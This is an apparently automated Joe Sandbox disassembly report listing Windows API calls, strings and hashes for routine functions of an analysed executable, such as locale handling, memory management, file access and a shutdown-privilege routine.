Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518

Uniqueness

Uniqueness Score: -1.00%

Function 00406F77 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A

Uniqueness

Uniqueness Score: -1.00%

Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00407DFC Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 004074A8 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 004074B8

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399

Uniqueness

Uniqueness Score: -1.00%

Function 00407DA4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040936C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7

Strings

SeShutdownPrivilege, xrefs: 00409393

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F

Uniqueness

Uniqueness Score: -1.00%

Function 00409AD0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E

Uniqueness

Uniqueness Score: -1.00%

Function 004051A8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748

Uniqueness

Uniqueness Score: -1.00%

Function 00405C44 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406F84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001

Strings

Locale, xrefs: 00406FF0
Control Panel\Desktop\ResourceLocale, xrefs: 00407010
.DEFAULT\Control Panel\International, xrefs: 00406FD8
GetUserDefaultUILanguage, xrefs: 00406FA3
kernel32.dll, xrefs: 00406FA8

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405314 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E

Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB

Strings

:mm, xrefs: 00405510
:mm:ss, xrefs: 0040552A
AMPM, xrefs: 004054F9
m/d/yy, xrefs: 004053FD
mmmm d, yyyy, xrefs: 0040541F

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(006BF6B8,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,006BF6B8,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(006C06B8,?,00000000,00008000,006BF6B8,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

Runtime error at 00000000, xrefs: 00403D96, 00403DA9
9@, xrefs: 00403D29, 00403D34
Error, xrefs: 00403D91

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Uniqueness

Uniqueness Score: -1.00%

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
